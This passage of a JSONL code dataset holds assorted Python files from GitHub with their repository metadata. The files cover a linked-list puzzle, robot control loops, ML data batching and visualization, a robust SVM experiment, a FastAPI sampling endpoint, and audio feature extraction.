singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def rotateRight(self, head: Optional[ListNode], k: int) -> Optional[ListNode]:\n if not head:\n return head\n n = 0\n curr = head\n prev = ListNode()\n while curr:\n prev = curr\n curr = curr.next\n n += 1\n last = prev\n \n \n k = k % n\n if k == 0:\n return head\n new_head = ListNode()\n current = head\n for i in range(n - k - 1):\n current = current.next\n \n new_head.next = current.next\n \n current.next = None\n last.next = head\n return new_head.next","repo_name":"Rediet-Ferew/competitive-programming","sub_path":"0061-rotate-list/0061-rotate-list.py","file_name":"0061-rotate-list.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37342543866","text":"#! 
/usr/bin/env python\nfrom simplified_dual_move_p import Dual_Move\nimport rospy\n'''run_first_pp_program = \npp_load + \npp.play +\nlisten to DOut[3] on pp\n\nrun_pp_program is listening to the digital output [3] in the pp robot \n\n'''\npick_and_place_robot = Dual_Move()\nprog_name = 'change this!!'\nround = 0\nwhile not rospy.is_shutdown():\n if round==0:\n pick_and_place_robot.run_first_pp_program()\n round = 1\n else:\n pick_and_place_robot.run_pp_program(prog_name)\n# In a different file\ndispense = Dual_Move()\nwhile not rospy.is_shutdown():\n # wait for the signal from \n dispense.run_d_program()\n ","repo_name":"evacheung0929/UR5e_Simulation_And_Dual_Arm_Control","sub_path":"Universal_Robots_ROS_Driver/ur_robot_driver/scripts/Dual_robot/IO/pickAndplace_run_final.py","file_name":"pickAndplace_run_final.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"16725305238","text":"import os\nimport random\nimport warnings\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torchvision.transforms.functional as TF\nfrom catalog.transforms import MMdetDataset2Torchvision, UnNormalize\nfrom torchvision.transforms import Compose\nfrom utils.experiment import makedir\n\nfrom .vision import plot_image_classification, plot_object_detection\n\nfunction_for_plotting = {\n \"image classification\": plot_image_classification,\n \"object detection\": plot_object_detection,\n}\npreprocessor_factory = {\n \"convert-mmdetbbox\": [MMdetDataset2Torchvision(to_xywh=False)],\n}\n\n\ndef plot_sample(\n data, task, mode=\"save\", savedir=\"results/example.png\", label_map=None, **kwargs\n):\n get_image = function_for_plotting[task]\n image = get_image(label_map=label_map, **data, **kwargs)\n\n assert mode in [\"save\", \"return\"]\n if mode == \"save\":\n plt.imshow(image)\n plt.axis(\"off\")\n plt.savefig(savedir)\n elif mode == \"return\":\n return image\n else:\n raise ValueError(f\"Invalid value {mode} for `mode`.\")\n\n\ndef plot_samples_from_dataset(\n dataset,\n task,\n random_indices=True,\n subplot_dim=(5, 5),\n save_to=\"results/samples_vis.png\",\n root_dir=\"\",\n image_tensor_to_numpy=True,\n is_01=True,\n unnormalize=False,\n normalization_mean=(0.5, 0.5, 0.5),\n normalization_std=(0.5, 0.5, 0.5),\n resize_to=None,\n plot_size=3,\n preprocess_f=None,\n label_map=None,\n seed=42,\n **kwargs,\n):\n \"\"\"\n Plot multiple samples using matplotlib.\n TODO: write docstring.\n Parameters\n \"\"\"\n save_to = os.path.join(root_dir, save_to)\n makedir(save_to)\n\n # build preprocessor\n if preprocess_f in preprocessor_factory.keys():\n print(f\"Found preprocessor `{preprocess_f}`\")\n preprocess_f = Compose(preprocessor_factory[preprocess_f])\n\n w, h = subplot_dim\n plt.figure(figsize=(w * plot_size, h * plot_size))\n\n if random_indices:\n idx_iter = random.Random(seed).sample(range(len(dataset)), w * h)\n else:\n idx_iter = range(w * h)\n for idx, i in enumerate(idx_iter):\n data = dataset[i]\n\n if preprocess_f is not None:\n\n data = preprocess_f(data)\n if resize_to:\n data[\"images\"] = TF.resize(\n data[\"images\"], resize_to, interpolation=TF.InterpolationMode.NEAREST\n )\n if unnormalize:\n data = UnNormalize(normalization_mean, normalization_std, key=None)(data)\n if image_tensor_to_numpy:\n data[\"images\"] = data[\"images\"].permute(1, 2, 0).numpy()\n\n # warn about range of values.\n if data[\"images\"].min() < -0.1:\n warnings.warn(\n f\"Input image is expected to have positive 
pixel values but has minimum \\\n                value of {data['images'].min()}. Are you sure you unnormalized the data?\"\n            )\n        if not is_01:\n            if data[\"images\"].max() < 1.1:\n                warnings.warn(\n                    f\"Input image is expected to be in range [0, 255] but has maximum \\\n                    value of {data['images'].max()}.\"\n                )\n            data[\"images\"] = data[\"images\"].astype(np.uint8)\n        else:\n            if data[\"images\"].max() > 1.1:\n                warnings.warn(\n                    f\"Input image is expected to be in range [0, 1] but has maximum \\\n                    value of {data['images'].max()}.\"\n                )\n\n        plt.subplot(w, h, idx + 1)\n        plot_image = plot_sample(\n            data=data, task=task, mode=\"return\", label_map=label_map, **kwargs\n        )\n        plt.imshow(plot_image)\n        plt.axis(\"off\")\n    plt.tight_layout()\n    plt.savefig(save_to)\n    print(\"Visualization of training data saved in:\", save_to)\n    plt.close()\n","repo_name":"sieu-n/awesome-modular-pytorch-lightning","sub_path":"utils/visualization/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"61"}
+{"seq_id":"33981545014","text":"\"\"\"\n/*\n * Challenge #5\n * ASPECT RATIO OF AN IMAGE\n * Statement published: 01/02/22\n * Solution published: 07/02/22\n * Difficulty: HARD\n *\n * Statement: Create a program that calculates the aspect ratio of an image from a url.\n * - Note: This exercise cannot be solved with the online Kotlin playground. Android Studio is required.\n * - Example url: https://raw.githubusercontent.com/mouredev/mouredev/master/mouredev_github_profile.png\n * - By ratio we mean, for example, the \"16:9\" of a 1920*1080px image.\n *\n * Additional information:\n * - Use the \"🔁reto-semanal\" channel of our discord (https://mouredev.com/discord) for questions, doubts, or to help the community.\n * - You can fork the repo and open a Pull Request to the original repo so we can see your contributed solution.\n * - I will review the exercise live on Twitch on the Monday following its publication.\n * - I will upload a possible solution to the exercise on the Monday following its publication.\n *\n */\n\"\"\"\nimport requests\nimport math\nfrom PIL import Image\nfrom io import BytesIO\n\ndef get_image(url: str) -> Image:\n    response = requests.get(url)\n    img = Image.open(BytesIO(response.content))\n    return img\n\ndef aspect_ratio(url: str) -> str:\n    img = get_image(url)\n    width, height = img.size\n    if width == height:\n        return \"1:1\"\n    gcd = math.gcd(height, width)\n    return f\"{width//gcd}:{height//gcd}\"\n\nif __name__ == \"__main__\":\n    url = \"https://raw.githubusercontent.com/mouredev/mouredev/master/mouredev_github_profile.png\"\n    print(aspect_ratio(url))\n","repo_name":"jmillana/code_challenges","sub_path":"challenges/5-aspectratio/aspect_ratio.py","file_name":"aspect_ratio.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11068641433","text":"import cv2\nimport os\nimport numpy as np\n\ndatos = \"Deteccion_facial/Personas/FotosConSinMascarilla\"\ncarpetas = os.listdir(datos)\nprint(\"File list:\", carpetas)\n\n\ntitulos = []\ndatosCara = []\nlabel = 0\n\nfor nombreCarpeta in carpetas:\n    directorio = datos + \"/\" + nombreCarpeta\n    \n    for file_name in os.listdir(directorio):\n        imagen = directorio + \"/\" + file_name\n        print(imagen)\n        image = cv2.imread(imagen, 0)\n        cv2.imshow(\"Image\", image)\n        cv2.waitKey(10)\n\n        datosCara.append(image)\n        titulos.append(label)\n    label += 1\n\nprint(\"Label 0: \", np.count_nonzero(np.array(titulos) == 0))\nprint(\"Label 1: \", np.count_nonzero(np.array(titulos) == 1))\n\n# LBPH FaceRecognizer\nface_mask = cv2.face.LBPHFaceRecognizer_create()\n\nprint(\"Gathering...\")\nface_mask.train(datosCara, np.array(titulos))\n\nface_mask.write(\"Deteccion_facial/modelo_mascarilla.xml\")\nprint(\"Model saved\")\n","repo_name":"NicoVivas27/Deteccion-objetos","sub_path":"Deteccion_facial/generarModelo.py","file_name":"generarModelo.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"35989538558","text":"import queue\nfrom random import shuffle\nimport codecs\nimport json\nimport glob\nimport numpy as np\nimport tensorflow as tf\nimport data\nfrom nltk.tokenize import sent_tokenize\n\nfrom nltk import tokenize\n\nFLAGS = tf.app.flags.FLAGS\nclass Srl_Example(object):\n\n\n    def __init__(self, text, srl, vocab, hps, mode=\"None\"):\n        start_decoding = vocab.word2id(data.START_DECODING)\n        stop_decoding = vocab.word2id(data.STOP_DECODING)\n\n\n        self.hps = hps\n\n        srl_sen_words = tokenize.word_tokenize(srl.strip())\n        #shuffle(srl_sen_words)\n        if mode == \"train\" and len(srl_sen_words) > 5:\n            srl_sen_words = srl_sen_words[:np.random.randint(5, len(srl_sen_words))]\n        if len(srl_sen_words) > hps.srl_max_enc_seq_len.value:\n            srl_sen_words = srl_sen_words[:hps.srl_max_enc_seq_len.value]\n\n        self.enc_input = [vocab.word2id(w) for w in\n                          srl_sen_words]  # list of word ids; OOVs are represented by the id for UNK token\n\n        self.enc_len = len(self.enc_input)\n\n\n        article_sen = text\n        article_sen_words = tokenize.word_tokenize(article_sen.strip())\n        if len(article_sen_words) > hps.srl_max_dec_seq_len.value:\n            article_sen_words = article_sen_words[:hps.srl_max_dec_seq_len.value]\n\n\n        abs_ids = [vocab.word2id(w) for w in\n                   article_sen_words]  # list of word ids; OOVs are represented by the id for UNK token\n\n        # Get the decoder input sequence and target sequence\n        self.dec_input, self.target = self.get_dec_inp_targ_seqs(abs_ids, hps.srl_max_dec_seq_len.value,\n                                                                 start_decoding,\n                                                                 stop_decoding)  # max_sen_num,max_len, start_doc_id, end_doc_id,start_id, stop_id\n        self.dec_len = len(self.dec_input)\n        #self.dec_sen_len = [len(sentence) for sentence in self.target]\n\n        self.orig_input = srl\n        self.orig_output = text\n\n\n    def get_dec_inp_targ_seqs(self, sequence, max_len, start_id, stop_id):\n        \"\"\"Given the reference summary as a sequence of tokens, return the input sequence for the decoder, and the target sequence which we will use to calculate loss. The sequence will be truncated if it is longer than max_len. 
The input sequence must start with the start_id and the target sequence must end with the stop_id (but not if it's been truncated).\n\n Args:\n sequence: List of ids (integers)\n max_len: integer\n start_id: integer\n stop_id: integer\n\n Returns:\n inp: sequence length <=max_len starting with start_id\n target: sequence same length as input, ending with stop_id only if there was no truncation\n \"\"\"\n\n inps = sequence[:]\n targets = sequence[:]\n\n\n inps = [start_id] + inps[:]\n if len(inps) > max_len:\n inps = inps[:max_len]\n\n if len(targets) >= max_len:\n targets = targets[:max_len - 1] # no end_token\n targets.append(stop_id) # end token\n else:\n targets = targets + [stop_id]\n\n return inps, targets\n\n def pad_decoder_inp_targ(self, max_sen_len, pad_doc_id):\n \"\"\"Pad decoder input and target sequences with pad_id up to max_len.\"\"\"\n\n\n\n\n while len(self.dec_input) < max_sen_len:\n self.dec_input.append(pad_doc_id)\n\n\n\n while len(self.target) < max_sen_len:\n self.target.append(pad_doc_id)\n\n\n def pad_encoder_inp_targ(self, max_sen_len, pad_doc_id):\n \"\"\"Pad decoder input and target sequences with pad_id up to max_len.\"\"\"\n\n\n while len(self.enc_input) < max_sen_len:\n self.enc_input.append(pad_doc_id)\n\n\n\n\n\n\n\nclass Srl_Batch(object):\n \"\"\"Class representing a minibatch of train/val/test examples for text summarization.\"\"\"\n\n def __init__(self, example_list, hps, vocab):\n \"\"\"Turns the example_list into a Batch object.\n\n Args:\n example_list: List of Example objects\n hps: hyperparameters\n vocab: Vocabulary object\n \"\"\"\n self.pad_id = vocab.word2id(data.PAD_TOKEN) # id of the PAD token used to pad sequences\n self.init_decoder_seq(example_list, hps) # initialize the input to the encoder\n\n def init_decoder_seq(self, example_list, hps):\n\n for ex in example_list:\n ex.pad_decoder_inp_targ(hps.srl_max_dec_seq_len.value, self.pad_id)\n ex.pad_encoder_inp_targ(hps.srl_max_enc_seq_len.value, self.pad_id)\n #pad_encoder_inp_targ(self, max_sen_len, max_sen_num, pad_doc_id):\n\n # Initialize the numpy arrays.\n # Note: our decoder inputs and targets must be the same length for each batch (second dimension = max_dec_steps) because we do not use a dynamic_rnn for decoding. 
However I believe this is possible, or will soon be possible, with Tensorflow 1.0, in which case it may be best to upgrade to that.\n\n self.enc_batch = np.zeros((hps.batch_size.value, hps.srl_max_enc_seq_len.value), dtype=np.int32)\n self.enc_lens = np.ones((hps.batch_size.value), dtype=np.int32)\n #self.dec_lens = np.zeros((hps.batch_size), dtype=np.int32)\n self.dec_batch = np.zeros((hps.batch_size.value, hps.srl_max_dec_seq_len.value), dtype=np.int32)\n self.target_batch = np.zeros((hps.batch_size.value, hps.srl_max_dec_seq_len.value), dtype=np.int32)\n self.dec_padding_mask = np.zeros((hps.batch_size.value, hps.srl_max_dec_seq_len.value),\n dtype=np.float32)\n #self.labels = np.zeros((hps.batch_size, hps.max_enc_sen_num, hps.max_enc_seq_len), dtype=np.int32)\n #self.dec_sen_lens = np.zeros((hps.batch_size, hps.srl_max_dec_sen_num), dtype=np.int32)\n self.dec_lens = np.zeros((hps.batch_size.value), dtype=np.int32)\n self.orig_outputs = []\n self.orig_inputs = []\n\n for i, ex in enumerate(example_list):\n #self.new_review_text = []\n #self.labels[i]=np.array([[ex.label for k in range(hps.max_enc_seq_len) ] for j in range(hps.max_enc_sen_num)])\n self.orig_outputs.append(ex.orig_output)\n self.orig_inputs.append(ex.orig_input)\n\n self.dec_lens[i] = ex.dec_len\n self.enc_lens[i] = ex.enc_len\n self.dec_batch[i, :] = np.array(ex.dec_input)\n self.enc_batch[i, :] = np.array(ex.enc_input)\n self.target_batch[i] = np.array(ex.target)\n\n\n self.target_batch = np.reshape(self.target_batch,\n [hps.batch_size.value, hps.srl_max_dec_seq_len.value])\n\n\n for i in range(len(self.target_batch)):\n for k in range(len(self.target_batch[i])):\n if int(self.target_batch[i][k]) != self.pad_id:\n self.dec_padding_mask[i][k] = 1\n\n\n self.dec_batch = np.reshape(self.dec_batch, [hps.batch_size.value, hps.srl_max_dec_seq_len.value])\n self.dec_lens = np.reshape(self.dec_lens, [hps.batch_size.value])\n\n self.enc_batch = np.reshape(self.enc_batch, [hps.batch_size.value, hps.srl_max_enc_seq_len.value])\n self.enc_lens = np.reshape(self.enc_lens, [hps.batch_size.value])\n #self.labels = np.reshape(self.labels, [hps.batch_size * hps.max_enc_sen_num, hps.max_enc_seq_len])\n\n\n\n\n\nclass Srl_GenBatcher(object):\n def __init__(self, vocab, hps):\n self._vocab = vocab\n self._hps = hps\n\n self.train_queue = self.fill_example_queue(\"data/0/train.txt\", \"train\")\n self.valid_queue = self.fill_example_queue(\"data/0/valid.txt\", \"valid\")\n self.test_queue = self.fill_example_queue(\"data/0/test.txt\", \"test\")\n\n # self.valid_transfer_queue_negetive = self.fill_example_queue(\n # \"valid/*\", mode=\"valid\", target_score=0)\n\n\n # self.test_queue = self.fill_example_queue(\"/home/xujingjing/code/review_summary/dataset/review_generation_dataset/test/*\")\n self.train_batch = self.create_batch(mode=\"train\")\n self.valid_batch = self.create_batch(mode=\"validation\", shuffleis=False)\n self.test_batch = self.create_batch(mode=\"test\", shuffleis=False)\n # train_batch = self.create_bach(mode=\"train\")\n\n def create_batch(self, mode=\"train\", shuffleis=True):\n all_batch = []\n\n if mode == \"train\":\n num_batches = int(len(self.train_queue) / self._hps.batch_size.value)\n\n\n elif mode == 'validation':\n num_batches = int(len(self.valid_queue) / self._hps.batch_size.value)\n\n elif mode == 'test':\n num_batches = int(len(self.test_queue) / self._hps.batch_size.value)\n\n\n for i in range(0, num_batches):\n batch = []\n if mode == 'train':\n batch += (\n self.train_queue[i * 
self._hps.batch_size.value:i * self._hps.batch_size.value + self._hps.batch_size.value])\n elif mode == 'validation':\n batch += (\n self.valid_queue[i * self._hps.batch_size.value:i * self._hps.batch_size.value + self._hps.batch_size.value])\n\n elif mode == 'test':\n batch += (\n self.test_queue[i * self._hps.batch_size.value:i * self._hps.batch_size.value + self._hps.batch_size.value])\n\n all_batch.append(Srl_Batch(batch, self._hps, self._vocab))\n\n if mode == \"train\" and shuffleis:\n shuffle(all_batch)\n\n return all_batch\n\n\n\n\n def get_batches(self, mode=\"train\"):\n\n if mode == \"train\":\n shuffle(self.train_batch)\n return self.train_batch\n elif mode == 'validation':\n return self.valid_batch\n elif mode == 'test':\n return self.test_batch\n\n def fill_example_queue(self, data_path, mode=\"None\"):\n\n new_queue = []\n\n reader = codecs.open(data_path, 'r', 'utf-8')\n j = 0\n while True:\n \n\n string_ = reader.readline()\n if not string_: break\n dict_example = json.loads(string_)\n srl = dict_example[\"skeleton\"]\n srl = srl.split(\"|||\")\n\n text = dict_example[\"text\"]\n text = sent_tokenize(text)\n for i,skeleton in enumerate(srl):\n \n example = Srl_Example(text[i], srl[i], self._vocab, self._hps,mode)\n new_queue.append(example)\n\n\n\n\n return new_queue\n\n\n\n","repo_name":"feliciss/Auto-Narrative-Generation-DL-with-Human-Intervence","sub_path":"code1/srl_seq_batch.py","file_name":"srl_seq_batch.py","file_ext":"py","file_size_in_byte":10240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34147985951","text":"from fastapi import FastAPI, File, UploadFile, Form\r\nfrom sklearn.model_selection import train_test_split\r\nimport pandas as pd\r\n\r\napp = FastAPI()\r\n\r\n\r\n@app.get(\"/\")\r\ndef index():\r\n return {\"name\": \"First Data\"}\r\n\r\n\r\n@app.post(\"/randomsample/\")\r\nasync def generate_samples(samples: int = Form(default=1), ratio: float = Form(default=0.75), csv_file: UploadFile = File(...)):\r\n print(samples, csv_file)\r\n population = pd.read_csv(csv_file.file)\r\n train = population.sample(frac=ratio)\r\n train.to_csv('1_train.csv', encoding='utf-8')\r\n remaining_population = population.loc[~population.index.isin(train.index), :]\r\n remaining_samples = samples-1\r\n for i in range(1, remaining_samples + 1):\r\n test = remaining_population\r\n test = test.sample(frac=i/remaining_samples)\r\n test.to_csv(f'{i}_test.csv', encoding='utf-8')\r\n remaining_population = remaining_population.loc[~remaining_population.index.isin(test.index), :]\r\n return {\"message\": f'{samples} sample created'}\r\n\r\n\r\n@app.post(\"/sklearnsample/\")\r\nasync def create_upload_file(response: str = Form(...), algo: str = Form(...), stratify_col: str = Form(default=''),\r\n csv_file: UploadFile = File(...)):\r\n population = pd.read_csv(csv_file.file)\r\n # response = 'co2emissions'\r\n y = population[[response]]\r\n predictors = list(population.columns)\r\n predictors.remove(response)\r\n x = population[predictors]\r\n if algo == \"simple\":\r\n x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=1234)\r\n else:\r\n x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=1234, stratify=x[stratify_col])\r\n x_train.to_csv('x_train.csv', encoding='utf-8')\r\n x_test.to_csv('x_test.csv', encoding='utf-8')\r\n\r\n y_train.to_csv('y_train.csv', encoding='utf-8')\r\n y_test.to_csv('y_test.csv', encoding='utf-8')\r\n return {\"message\": \" samples created: x_train, 
x_test, y_train, y_test\"}\r\n","repo_name":"mihirlaldas/ds-backend","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74126377475","text":"\"\"\"\nAn implementation of Robust SVM.\n\n2020.11.14\n\nReference: Bertsimas, D., Dunn, J., Pawlowski, C., & Zhuo, Y. D. (2019).\n Robust classification. INFORMS Journal on Optimization, 1(1), 2-34.\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nimport tensorflow_datasets as tfds\nfrom sklearn import datasets\nfrom sklearn.metrics import hinge_loss\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import normalize\nfrom sklearn.svm import SVC\nimport collections\nfrom gurobipy import *\nimport matplotlib.pyplot as plt\nfrom utils import load_data\n\nnp.random.seed(1)\n\nDATA_LIST = [\"synthetic\", \"wine\", \"credit\"]\n\n\ni = 0\nfor dataset in DATA_LIST:\n\n plt.figure(i)\n\n X_train, X_test, Y_train, Y_test = load_data(dataset)\n\n # Create two lists - \"x_axis\" and \"y_axis\" for storing the according\n # hyperparameter and the loss for each hyperparameter.\n x_axis = []\n y_axis = []\n\n print(collections.Counter(Y_train))\n\n print(X_train.shape)\n print(Y_train)\n\n\n NUM_DATA = X_train.shape[0]\n NUM_FEATURES = X_train.shape[1]\n\n print(\"Now processing dataset: {}\".format(dataset))\n print(\"# features: {}, # data points: {}\".format(NUM_FEATURES, NUM_DATA))\n\n if dataset == 'synthetic':\n rho_list = np.linspace(0, 0.5, 25)\n else:\n rho_list = np.linspace(0, 0.0002, 25)\n\n ########### Use Gurobi to train SVMs under different degrees of robustness #############\n for rho in rho_list:\n\n SVM = Model(\"robust_svm\")\n\n itas = SVM.addVars(range(NUM_DATA), vtype=GRB.CONTINUOUS, obj=[1]*NUM_DATA)\n W = SVM.addVars(range(NUM_FEATURES), lb=-GRB.INFINITY, vtype=GRB.CONTINUOUS, obj=[0]*NUM_FEATURES)\n b = SVM.addVar(vtype=GRB.CONTINUOUS, lb=-GRB.INFINITY, obj=0)\n W_abs = SVM.addVars(range(NUM_FEATURES), vtype=GRB.CONTINUOUS, obj=0)\n\n SVM.modelSense = GRB.MINIMIZE\n SVM.Params.outputFlag = 0\n SVM.addConstrs(W_abs[i] == abs_(W[i]) for i in range(NUM_FEATURES))\n\n for i in range(NUM_DATA):\n SVM.addConstr(Y_train[i] * (quicksum([W[j] * X_train[i][j] for j in \\\n range(NUM_FEATURES)]) - b) - rho * W_abs.sum('*') >= 1 - itas[i])\n\n SVM.optimize()\n\n W_np = np.zeros(NUM_FEATURES)\n for j in range(NUM_FEATURES):\n W_np[j] = W[j].x\n W_np = W_np.reshape((W_np.shape[0], 1))\n Y_pred = X_test @ W_np - b.x\n # Y_pred = np.where(Y_pred > 0, 1, -1)\n Y_pred = Y_pred.reshape((Y_pred.shape[0],))\n Y_pred = np.where(Y_pred < 0, -1, Y_pred)\n Y_pred = np.where(Y_pred >= 0, 1, Y_pred)\n print(\"Y_test: {}, Y_pred: {}\".format(Y_test.shape, Y_pred.shape))\n acc = sum(Y_pred.flatten() == Y_test) / len(Y_test)\n #loss = hinge_loss(Y_test, Y_pred)\n #print(\"the test hinge loss for SVM under rho = {}: {}\".format(rho, loss))\n\n x_axis.append(rho)\n y_axis.append(acc)\n\n plt.title(\"accuracy vs. 
robustness in SVM - {}\".format(dataset))\n plt.plot(x_axis, y_axis)\n plt.xlabel('rho')\n plt.ylabel('accuracy')\n plt.ticklabel_format(style='sci', axis='x', scilimits=(0,0))\n plt.savefig(\"SVM_{}.png\".format(dataset))\n\n i += 1\n","repo_name":"DarrenZhang01/robust_classification","sub_path":"robust_svm.py","file_name":"robust_svm.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36438367679","text":"import ast\nimport threading\nimport time\n\nimport helper\nfrom holon.HolonicAgent import HolonicAgent\nfrom brain import brain_helper\n\n\nlogger = helper.get_logger()\n\n\nclass Conscious(HolonicAgent):\n def __init__(self, cfg):\n self._init = False\n super().__init__(cfg)\n\n\n def _on_connect(self):\n super()._on_connect()\n\n\n def _on_topic(self, topic, data):\n super()._on_topic(topic, data)\n\n\n def _live(self):\n if not self._init:\n self._init = True\n time.sleep(3)\n # brain_helper.speak(self, \"Good morning, Mr. Zhang. It's a sunny day today, perfect for a walk! How did you sleep last night?\")\n brain_helper.speak(self, \"早安,張先生。今天天氣不錯,很適合散步哦。您今天睡得怎麼樣?\")\n # time.sleep(20)\n # self._init = False\n \n \n def _running(self):\n while self._is_running():\n try:\n self._live()\n time.sleep(.1)\n except Exception as ex:\n logger.exception(ex)\n","repo_name":"mfshiu/parallel_tts","sub_path":"brain/conscious.py","file_name":"conscious.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26047306625","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import linregress, t, sem\n\n\ndef get_data_from_file(filepath):\n \"\"\" Read mass meseaurment from data capture file \"\"\"\n data = list()\n with open(filepath, \"r\") as fd:\n lines = fd.readlines()\n for line in lines:\n m = line.split()[2]\n data.append(float(m))\n return data\n\ndef mean_confidence_interval(data_raw, confidence=0.95):\n data = 1.0 * np.array(data_raw)\n n = len(data)\n mean, std_err_mean = np.mean(data), sem(data)\n h = std_err_mean * t.ppf((1 + confidence) / 2., n-1)\n return mean, mean-h, mean+h\n\n# Import data from files\ncapt_2 = get_data_from_file(\"../capture2\")\ncapt_3 = get_data_from_file(\"../capture3\")\ncapt_4 = get_data_from_file(\"../capture4\")\n\n# Reducing capt_2 to one point per mass\nmeas = [\n capt_2[0:30],\n capt_2[32:73],\n capt_2[77:129],\n capt_2[132:169],\n capt_2[172:203],\n capt_2[210:240],\n capt_2[243:281],\n capt_2[286:323],\n capt_2[326:354],\n capt_2[360:387],\n capt_2[389:],\n]\ny2 = [np.mean(i) for i in meas]\nx2 = [i for i in range(0, len(y2))]\n\npcc_2 = linregress(x2,y2)[2]\nprint(\"PPC capt_2: %s\" % str(pcc_2))\n\n# fit capt_2 to linear function\nfit_2 = np.polyfit(x2, y2, 1)\nfit_fn_2 = np.poly1d(fit_2)\nprint(\"capt_2 fn: %s\" % fit_fn_2)\n\n# plot capt_2\nplt.plot(x2, y2, \"yo\", label=\"capt_2_points\")\nplt.plot(x2, fit_fn_2(x2), \"--k\", label=\"capt_2_fit: %s\" % fit_fn_2)\n\n# Reducing capt_3 to one point per mass\nmeas = [\n capt_3[27:80],\n capt_3[143:191],\n capt_3[254:313],\n capt_3[378:426],\n capt_3[486:525],\n capt_3[585:623],\n capt_3[679:718],\n capt_3[775:823],\n capt_3[895:951],\n capt_3[1031:1089],\n]\ny3 = [np.mean(i) for i in meas]\nx3 = [i for i in range(0, len(y3))]\n\nprint(\"Data points capt_3: %s\" % y3)\nmean, s1, s2 = mean_confidence_interval(y3)\nprint(\"mean: %s, s1: %s, s2: %s\" % 
mean_confidence_interval(y3))\nprint(\"Distance to mean: %s\" % (mean-s1)) \n\npcc_3 = linregress(x3,y3)[2]\nprint(\"PPC capt_3: %s\" % str(pcc_3))\n\n# fit capt_3 to linear function\nfit_3 = np.polyfit(x3, y3, 1)\nfit_fn_3 = np.poly1d(fit_3)\n\n# Reducing capt_4 to one point per mass\nmeas = [\n capt_4[0:167],\n capt_4[169:206],\n capt_4[210:259],\n capt_4[254:285],\n capt_4[287:333],\n capt_4[337:383],\n capt_4[388:438],\n capt_4[444:489],\n capt_4[495:537],\n capt_4[542:583],\n capt_4[587:]\n]\ny4 = [np.mean(i) for i in meas]\nx4 = [i for i in range(0, len(y4))]\n\npcc_4 = linregress(x4,y4)[2]\nprint(\"PPC capt_4: %s\" % str(pcc_4))\n\n# fit capt_4 to linear function\nfit_4 = np.polyfit(x4, y4, 1)\nfit_fn_4 = np.poly1d(fit_4)\nprint(\"capt_4 fn: %s\" % fit_fn_4)\n\n# plot capt_4\nplt.plot(x4, y4, \"ro\", label=\"capt_4_points\")\nplt.plot(x4, fit_fn_4(x4), \"-k\", label=\"capt_4_fit: %s\" % fit_fn_4)\n\nplt.legend()\nplt.title(\"Zero-drift and Sensitivity-drift\")\nplt.ylabel(\"Weight / kg\")\nplt.xlabel(\"Number of nuts\")\nplt.show()\n","repo_name":"Hogfeldt/gfv1","sub_path":"Lab4/databehandling/databehandling.py","file_name":"databehandling.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20656705204","text":"import csv\nimport os\nimport librosa\nimport numpy as np\n\nimport pandas as pd\nimport scipy\nfrom sklearn.metrics import mean_absolute_percentage_error\n\nN_MFCC = 20\n\nfilepath = \"./data/Sounds-dataset/Алексей/Вход-не распознано Алексей.wav\"\n\ny, sr = librosa.load(filepath, mono=True)\n\ndef find_match(file1, file2):\n for w in [\"Вход\", \"Пицца\", \"Привет\", \"Собака\", \"Шкаф\"]:\n if w in file1 and w in file2:\n return 1\n return 0\n\n\ndef get_features(y, sr):\n features = []\n features.extend([np.mean(e) for e in librosa.feature.mfcc(y=y, sr=sr, n_mfcc=20)]) #mfcc_mean\n features.extend([np.std(e) for e in librosa.feature.mfcc(y=y, sr=sr, n_mfcc=20)]) # mfcc_std\n features.append(np.mean(librosa.feature.spectral_centroid(y=y, sr=sr).T,axis=0)[0]) # cent_mean\n features.append(np.std(librosa.feature.spectral_centroid(y=y, sr=sr).T,axis=0)[0]) # cent_std\n features.append(scipy.stats.skew(librosa.feature.spectral_centroid(y=y, sr=sr).T,axis=0)[0]) # cent_skew\n features.append(np.mean(librosa.feature.spectral_rolloff(y=y, sr=sr).T,axis=0)[0]) # rolloff_mean\n features.append(np.std(librosa.feature.spectral_rolloff(y=y, sr=sr).T,axis=0)[0]) # roloff_std\n return features\n\ndef get_headers(files_n = 2,mfcc_n=20, include_dirs = False):\n header = []\n if include_dirs:\n for n in range(files_n):\n header.append(f'dir{n}')\n for n in range(files_n):\n header.append(f'fname{n}')\n for n in range(files_n):\n header.extend([f'f{n}_mfcc_mean{i}' for i in range(1, mfcc_n+1)])\n header.extend([f'f{n}_mfcc_std{i}' for i in range(1, mfcc_n+1)])\n header.extend([f'f{n}_cent_mean', f'f{n}_cent_std', f'f{n}_cent_skew', f'f{n}_rolloff_mean', f'f{n}_rolloff_std'])\n return header\n\n#execute once to 